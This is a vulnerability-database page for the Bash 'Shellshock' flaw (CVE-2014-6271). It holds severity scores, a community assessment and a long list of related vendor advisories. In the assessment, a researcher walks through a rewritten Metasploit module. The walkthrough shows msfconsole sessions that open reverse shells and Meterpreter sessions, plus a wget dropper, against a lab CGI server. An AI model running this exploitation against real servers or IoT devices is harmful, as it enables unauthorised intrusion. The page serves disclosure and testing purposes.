Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
attackerkbAttackerKBAKB:5200081C-5C1D-47C7-88A9-89C269E0482E
HistorySep 24, 2014 - 12:00 a.m.

CVE-2014-6271

2014-09-2400:00:00
attackerkb.com
18

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

JSON

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Recent assessments:

h00die-gr3y at May 21, 2023 3:28pm UTC reported:

An Golden Oldie from 2014 that is still very relevant nowadays.

In my recent research of security vulnerabilities, I bumped into several targets that were still vulnerable to CVE-2014-6271 a.k.a. Shellshock and CVE-2014-6278. You should not be surprised that most of these targets are IoT based with an embedded Linux/Unix image running a vulnerable bash version. They typically do not get updated at all and are easy targets for a malicious actor to find an entry point into the network.

Metasploit modules like exploit/multi/http/apache_mod_cgi_bash_env_exec, are pretty restricted to launch an attack due to the limited platform support (only x86) and payloads that can be leveraged in an attack. This brought me to rewrite this module a bit so that it would support multiple platforms (ARM, x86, x64, MIPS) and multiple payloads such as Unix command and Linux Dropper. The module name is multi/http/bash_env_cgi_rce.

To test the module locally, you download a vulnerable bash version from <https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz&gt;. Any version published before September 2014 is okay. Just extract it in a local directory and compile it with ./configure && make.

Configure an Apache or any other preferred web server to support CGI scripts. You can find tons of instructions on the web how to do that.
Just create a script like below using the vulnerable bash version and add this to the cgi-bin directory of your preferred web server.

#!/bin/bash_CVE_2014_6271
echo "Content-type: text/plain"
echo
echo
echo "Hello World"

Download module from here and follow the install instructions.
Start msfconsole and play around with the different options and payloads.

msf6 &gt; use exploits/multi/http/bash_env_cgi_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; options

Module options (exploit/multi/http/bash_env_cgi_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CVE          Automatic        yes       CVE to check/exploit (Accepted: Automatic, CVE-2014-62
                                           71, CVE-2014-6278)
   HEADER       User-Agent       yes       HTTP header to use
   METHOD       GET              yes       HTTP method to use
   PAYLOADSIZE  2048             yes       Payload size used by the CmdStager
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port
                                           ][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/do
                                           cs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly
                                           generated)
   TARGETURI                     yes       Path to CGI script
   URIPATH                       no        The URI to use for this exploit (default is random)
   VHOST                         no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This mus
                                       t be an address on the local machine or 0.0.0.0 to listen
                                       on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/bash_env_cgi_rce) &gt; set rhosts 192.168.201.10
rhosts =&gt; 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; set targeturi /cgi-bin/test.cgi
targeturi =&gt; /cgi-bin/test.cgi
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; check

[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] 192.168.201.10:80 - The target is vulnerable.
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; set lhost 192.168.201.10
lhost =&gt; 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; set lport 4444
lport =&gt; 4444
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash using vulnerability CVE-2014-6271.
[*] Command shell session 1 opened (192.168.201.10:4444 -&gt; 192.168.201.10:35766) at 2023-05-21 15:01:17 +0000

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux

Python Meterpreter payload example

msf6 exploit(multi/http/bash_env_cgi_rce) &gt; set payload cmd/unix/python/meterpreter/reverse_tcp
payload =&gt; cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp using vulnerability CVE-2014-6271.
[*] Sending stage (24772 bytes) to 192.168.201.10
[*] Meterpreter session 2 opened (192.168.201.10:4444 -&gt; 192.168.201.10:35678) at 2023-05-21 15:03:48 +0000

meterpreter &gt; sysinfo
Computer     : cerberus
OS           : Linux 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03)
Architecture : aarch64
Meterpreter  : python/linux
meterpreter &gt; getuid
Server username: www-data
meterpreter &gt;

Linux File dropper using payload: linux/aarch64/meterpreter_reverse_tcp

msf6 exploit(multi/http/bash_env_cgi_rce) &gt; set target 1
target =&gt; 1
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; set payload linux/aarch64/meterpreter_reverse_tcp
payload =&gt; linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; set CMDSTAGER::FLAVOR wget
CMDSTAGER::FLAVOR =&gt; wget
msf6 exploit(multi/http/bash_env_cgi_rce) &gt; exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp using vulnerability CVE-2014-6271.
[*] Using URL: http://192.168.201.10:8080/ZzirBKe
[*] Client 192.168.201.10 (Wget/1.21.3) requested /ZzirBKe
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[*] Meterpreter session 3 opened (192.168.201.10:4444 -&gt; 192.168.201.10:34346) at 2023-05-21 15:10:11 +0000
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter &gt; sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter &gt; getuid
Server username: www-data
meterpreter &gt;

If you use CMDSTAGER::FLAVOR option bourne or printf, please ensure that your payload size is 2048 or below.
You can control this with the option PAYLOADSIZE

Have fun !!!

References

Metasploit module multi/http/bash_env_cgi_rce

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5

References

Related

arista 1
suse 2
openvas 18
debiancve 4
prion 6
nessus 52
cve 6
ubuntucve 4
metasploit 3
seebug 2
zdt 2
packetstorm 5
fedora 3
ibm 44
lenovo 1
osv 1
veracode 2
archlinux 1
cloudfoundry 1
nuclei 1
checkpoint_security 1
paloalto 1
cisa_kev 1
securityvulns 7
thn 1
attackerkb 2
freebsd 1
debian 3
threatpost 2
symantec 1
myhack58 1
mageia 1
ics 1
gentoo 1
hp 1
vmware 2
f5 2
jvn 1
citrix 1
checkpoint_advisories 1
cisco 1
kitploit 1
huawei 1
nvidia 1
redhat 2
fortinet 1
nmap 1
arista
arista
Security Advisory 0006
2014-09-29 00:00:00
suse
suse
Security update for Containment-Studio (important)
2014-10-14 01:05:00
bash (important)
2014-09-30 17:05:22
openvas
openvas
GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03
2014-10-01 00:00:00
GNU Bash Environment Variable Handling Shell Remote Command Execution Vulnerability
2014-09-25 00:00:00
GNU Bash Environment Variable Handling Shell Remote Command Execution Vulnerability (SIP Check)
2014-09-29 00:00:00
debiancve
debiancve
CVE-2014-6278
2014-09-30 10:55:00
CVE-2014-6271
2014-09-24 18:48:00
CVE-2014-7169
2014-09-25 01:55:00
prion
prion
Design/Logic Flaw
2014-09-30 10:55:00
Design/Logic Flaw
2014-09-24 18:48:00
Design/Logic Flaw
2014-09-25 01:55:00
nessus
nessus
GNU Bash Incomplete Fix Remote Code Injection (Shellshock)
2015-04-06 00:00:00
Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)
2017-12-04 00:00:00
Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)
2014-09-29 00:00:00
cve
cve
CVE-2014-6278
2014-09-30 10:55:00
CVE-2014-6271
2014-09-24 18:48:00
CVE-2014-7169
2014-09-25 01:55:00
ubuntucve
ubuntucve
CVE-2014-6278
2014-09-30 00:00:00
CVE-2014-6271
2014-09-24 00:00:00
CVE-2014-7169
2014-09-25 00:00:00
metasploit
metasploit
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
2014-09-25 06:19:14
CUPS Filter Bash Environment Variable Code Injection (Shellshock)
2014-10-19 17:58:49
Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2014-09-25 18:26:57
seebug
seebug
CUPS Filter Bash Environment Variable Code Injection
2014-11-13 00:00:00
Bash 4.3 远程命令执行漏洞 (破壳)
2014-09-26 00:00:00
zdt
zdt
CUPS Filter Bash Environment Variable Code Injection Exploit
2014-10-29 00:00:00
DNS Reverse Lookup Shellshock Exploit
2014-10-14 00:00:00
packetstorm
packetstorm
CUPS Filter Bash Environment Variable Code Injection
2014-10-28 00:00:00
Gnu Bash 4.3 CGI REFERER Command Injection
2014-09-26 00:00:00
Gnu Bash 4.3 CGI Scan Remote Command Injection
2014-09-26 00:00:00
fedora
fedora
[SECURITY] Fedora 21 Update: bash-4.3.25-2.fc21
2014-09-27 10:08:26
[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
2014-09-26 09:03:00
[SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19
2014-09-26 09:00:48
ibm
ibm
Security Bulletin: IBM Tivoli Workload Scheduler (CVE-2014-6271, CVE-2014-7169)
2018-06-17 14:50:13
Security Bulletin: Vulnerabilities in Bash affect the IBM Hyper-Scale Manager component of the XIV Management Tools (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
2018-06-18 00:08:42
Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
2018-06-16 13:58:11
lenovo
lenovo
GNU Bourne-Again Shell (Bash) 'Shellshock' - Lenovo Support US
2016-11-16 00:00:00
osv
osv
bash - security update
2014-09-25 00:00:00
veracode
veracode
Arbitrary File Overwrite
2019-01-15 09:02:02
Remote Code Execution (RCE)
2019-01-15 09:01:57
archlinux
archlinux
bash: Remote code execution
2014-09-26 00:00:00
cloudfoundry
cloudfoundry
CVE-2014-6271 and CVE-2014-7169 - ShellShock | Cloud Foundry
2014-09-25 00:00:00
nuclei
nuclei
ShellShock - Remote Code Execution
2020-10-01 18:03:35
checkpoint_security
checkpoint_security
Check Point Response to CVE-2014-6271 and CVE-2014-7169 Bash Code Injection vulnerability
2014-09-24 21:00:00
paloalto
paloalto
Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
2014-09-24 00:00:00
cisa_kev
cisa_kev
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
2022-01-28 00:00:00
securityvulns
securityvulns
[security bulletin] HPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code
2014-10-05 00:00:00
[security bulletin] HPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System &#40;vCAS&#41; running Bash Shell, Remote Code Execution
2014-10-05 00:00:00
[security bulletin] HPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell, Remote Code Execution
2014-10-13 00:00:00
thn
thn
Hackers Using 'Shellshock' Bash Vulnerability to Launch Botnet Attacks
2014-09-26 20:07:00
attackerkb
attackerkb
CVE-2014-7169
2014-09-25 00:00:00
CVE-2014-6277
2014-09-27 00:00:00
freebsd
freebsd
bash -- remote code execution vulnerability
2014-09-24 00:00:00
debian
debian
[SECURITY] [DSA 3035-1] bash security update
2014-09-25 21:18:46
[SECURITY] [DSA 3035-1] bash security update
2014-09-25 21:18:46
[SECURITY] [DLA 63-1] bash security update
2014-09-25 22:35:21
threatpost
threatpost
Bash Botnet Exploit Found, Bash Patches Incomplete
2014-09-25 11:41:51
Researcher Takes Wraps off Undisclosed Bash Vulnerabilities
2014-10-03 05:00:50
symantec
symantec
GNU Bash CVE-2014-6271 Remote Code Execution Vulnerability
2014-09-24 00:00:00
myhack58
myhack58
bash code injection security vulnerability-vulnerability warning-the black bar safety net
2014-09-28 00:00:00
mageia
mageia
Updated bash packages fix CVE-2014-7169
2014-09-28 16:17:31
ics
ics
Bash Command Injection Vulnerability (Update A)
2018-09-06 12:00:00
gentoo
gentoo
Bash: Code Injection (Updated fix for GLSA 201409-09)
2014-09-25 00:00:00
hp
hp
HPSBHF03119 rev.3 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution
2014-09-30 00:00:00
vmware
vmware
VMware product updates address critical Bash security vulnerabilities
2014-09-30 00:00:00
VMware product updates address critical Bash security vulnerabilities
2014-09-30 00:00:00
f5
f5
SOL15629 - Multiple GNU Bash vulnerabilities
2014-09-25 00:00:00
K15629 : Multiple GNU Bash vulnerabilities
2015-05-22 00:00:00
jvn
jvn
JVN#55667175: QNAP QTS vulnerable to OS command injection
2014-10-28 00:00:00
citrix
citrix
Citrix Security Advisory for GNU Bash Shellshock Vulnerabilities
2014-09-26 04:00:00
checkpoint_advisories
checkpoint_advisories
GNU Bash Remote Code Execution (CVE-2014-6271; CVE-2014-6277; CVE-2014-6278; CVE-2014-7169; CVE-2014-7186; CVE-2014-7187)
2014-09-25 00:00:00
cisco
cisco
GNU Bash Environment Variable Command Injection Vulnerability
2014-09-26 01:00:00
kitploit
kitploit
ShellShockHunter - It's A Simple Tool For Test Vulnerability Shellshock
2021-02-10 11:30:00
huawei
huawei
Security Advisory-Bash Code Injection Vulnerability
2014-10-24 00:00:00
nvidia
nvidia
Security Bulletin: Vulnerabilities in Bash affect NVIDIA Tegra Linux L4T CVE 2014-6271, CVE 2014-7169, CVE 2014-7186, CVE 2014-7187, CVE 2014-6277, CVE 2014-6278
2015-03-03 00:00:00
redhat
redhat
(RHSA-2014:1306) Important: bash security update
2014-09-26 00:00:00
(RHSA-2014:1312) Important: bash Shift_JIS security update
2014-09-26 00:00:00
fortinet
fortinet
Remote Exploit Vulnerability in Bash - (Shellshock)
2014-09-25 00:00:00
nmap
nmap
http-shellshock NSE Script
2015-01-17 03:01:58

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

JSON
Related for AKB:5200081C-5C1D-47C7-88A9-89C269E0482E
arista1suse2openvas18debiancve4prion6nessus52cve6ubuntucve4metasploit3seebug2zdt2packetstorm5fedora3ibm44lenovo1osv1veracode2archlinux1cloudfoundry1nuclei1checkpoint_security1paloalto1cisa_kev1securityvulns7thn1attackerkb2freebsd1debian3threatpost2symantec1myhack581mageia1ics1gentoo1hp1vmware2f52jvn1citrix1checkpoint_advisories1cisco1kitploit1huawei1nvidia1redhat2fortinet1nmap1